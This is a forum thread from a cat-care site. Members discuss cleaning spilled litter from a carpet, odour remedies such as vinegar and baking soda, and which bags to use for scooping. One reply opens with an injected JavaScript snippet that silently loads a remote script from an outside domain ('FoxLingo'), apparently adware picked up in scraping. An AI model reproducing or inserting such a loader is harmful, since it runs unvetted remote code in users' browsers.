Spilt litter.. has this happened?

Draco

NOT Malfoy!
Veteran
Purraise
OK, so i was scooping my cats litter. I was using a regular plastic shopping bag (which I normally don't use). Since i forgot to clean for the past two days, the litter was heavy.. and it ripped through the bag.

Clumps of urine broke over my carpet.. (and yes, I was ANGRY!!)

I cleaned it up, vaccuumed and scrubbed the area.

But I am worried that the smell of urine would be in the carpet still.. I fear the cats will choose that spot to pee (they've never peed outside the box)

am I worrying too much? I don't want to spend the money on enzyme cleaner if I am just worrying too much!

natalie_ca

TCS Member
Top Cat
Purraise
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}(); Personally seeing that it was urine in clumps of litter and not direct urine that would soak into the fibre, I wouldn't worry about it.  Vacuuming and washing the area with some kind of detergent should be enough.

terestrife

TCS Member
Top Cat
Purraise
by the way, i like using those blue bags that are used to pick up pets feces and pee while taking them for a walk. it is more reliable than shopping bags. shopping bags sometimes have holes so i would have litter falling to the floor whenever i would clean the litter box. very annoying!

oh and, on the first week that i adopted my kitten she got so nervous being on the 2nd floor bedroom and her litterbox was downstairs that she peed and pooped in the shower. it was only the one time and shes never done it again. so not all cats will pee in an area where there is the smell of thier urine.

Last edited:

catspaw66

TCS Member
Veteran
Purraise
I buy the 4 gallon bags that come on a roll.  About $5 for a hundred.  I can scoop all boxes into one bag daily.

matts mom

TCS Member
Super Cat
Purraise
by the way, i like using those blue bags that are used to pick up pets feces and pee while taking them for a walk. it is more reliable than shopping bags. shopping bags sometimes have holes so i would have litter falling to the floor whenever i would clean the litter box. very annoying!

oh and, on the first week that i adopted my kitten she got so nervous being on the 2nd floor bedroom and her litterbox was downstairs that she peed and pooped in the shower. it was only the one time and shes never done it again. so not all cats will pee in an area where there is the smell of thier urine.
I like those dog pick-up bags too...it's all I  use when litter cleaning. i wonder what it is about upset cats and showers? the night I got matt he went in my tub,,,,,,I had pine litter n the litter box and he didn't recognize it, so in a panic he used the tub. Once I got litter he recognized into his box(standard clumping) he was fine, but he simply didn't know that the pine granuals were litter poor thing, and couldn't find a box in this strange new home.........

missymotus

TCS Member
Top Cat
Purraise
a little white vinegar mixed with water and sprayed onto the area will help to take out any smells that may attract the cats.

terestrife

TCS Member
Top Cat
Purraise
I like those dog pick-up bags too...it's all I  use when litter cleaning. i wonder what it is about upset cats and showers? the night I got matt he went in my tub,,,,,,I had pine litter n the litter box and he didn't recognize it, so in a panic he used the tub. Once I got litter he recognized into his box(standard clumping) he was fine, but he simply didn't know that the pine granuals were litter poor thing, and couldn't find a box in this strange new home.........
awww! poor kitty! i dont know why showers are so comforting to cats, its cold and slippery. maybe they smell in the air that its our litterbox so they think its ok to be in there and use it as a restroom? thankfully my cat has never done it again.

ive seen pictures online of cats that use bathroom sinks as their bed. lol

• Thread Starter Thread Starter

Draco

NOT Malfoy!
Veteran
Purraise
I normally don't use the plastic bags (as indicated in first post).. I ran out of the doggy bags!

matts mom

TCS Member
Super Cat
Purraise
I normally don't use the plastic bags (as indicated in first post).. I ran out of the doggy bags!
i did notice that you don't normally use shopping bags....i think the doggy bags came up as a suggestion because we didn't know you use  them......and it turns out we all love them.

regarding thecarpet, if it isn't smelling too bad, you could put some baking soda on it, leave it for anhour, then vaccuum it up. i remember  a LOT of pet owners I knew back in the 90's swore by that one before they came out with all the expensive enzyme cleaners and stuff. can't say if it works myself, because I only got my first cat 4yearsago, but I used to freshen my room that way

Winchester

In the kitchen with my cookies
Veteran
Purraise
Our Old Coot, Hydrox, was both a pee-er and a sprayer. From the time he was a kitten, we had trouble with him going everywhere. Despite me threatening to kick him out of the house on a daily basis (and I'm kidding....I swear!), he lived to be 20 years old. And he peed throughout the house pretty much the entire time. As other cats decided to come live with us, I was petrified that they would pick up his peeing habits, but thankfully nobody ever did. We used vinegar to clean his areas and would sprinkle with baking soda, then vacuum after it dried. After he passed away, we took the old carpet up from the living room and the stairs.
I buy the 4 gallon bags that come on a roll.  About $5 for a hundred.  I can scoop all boxes into one bag daily.
catspaw66, where do you get those gallon bags on a roll? I don't recall seeing anything like that and, since I'm using shopping bags as litter bags and I'm always finding holes in those bags, so cannot use them unless I double or triple bag. Do you get them at the grocery store or Target? What should I look for? Thank you.
My mother said that every once in a while, Muffin would poop in her bathtub. She didn't know why and she tried to keep her litter box as clean as she could. So far, *knock on wood* Muffin has been doing well in our house, even with the seven other cats. Mom used Yesterdays News cat litter and I don't think Muffin cared for it very much. We have her litter box here; it has Yesterdays News in it and she's never used it since we left her out into the house (she was in the computer room for a little over a week when we first brought her home); she prefers Tidy Cats, I guess, because she always uses one of the boxes in our bathroom. (I can tell her poop from the other cats because she gets a different food.)

• Thread Starter Thread Starter

Draco

NOT Malfoy!
Veteran
Purraise
i did notice that you don't normally use shopping bags....i think the doggy bags came up as a suggestion because we didn't know you use  them......and it turns out we all love them.

regarding thecarpet, if it isn't smelling too bad, you could put some baking soda on it, leave it for anhour, then vaccuum it up. i remember  a LOT of pet owners I knew back in the 90's swore by that one before they came out with all the expensive enzyme cleaners and stuff. can't say if it works myself, because I only got my first cat 4yearsago, but I used to freshen my room that way
thanks for the baking soda idea! I will try that, on all of my carpet! Just to have it freshened up

catspaw66

TCS Member
Veteran
Purraise
I get the 4 gallon bags at walmart.  They are in the section with the trash bags.  Look carefully at the package, though.  The stockers here don't seem to be able to read and stick them in the 13 gal. slot. They are Ruffies color scents 4 gallon small garbage bags.  The scent helps cover the odor while in the big trash bags before I take them to the dumpster. (which is half a mile away)

kookycats

TCS Member
Top Cat
Purraise
Baking soda is so great for so many things.

I use the plastic grocery bags from the supermarket to scoop and dispose of litter. Do it every morning and sometimes before we go to bed.

Once or twice one of the cats peed on the bathroom rug (it's that micro-fibre material). Don't know why they did it, but I washed it with very hot water and so far it hasn't happened again.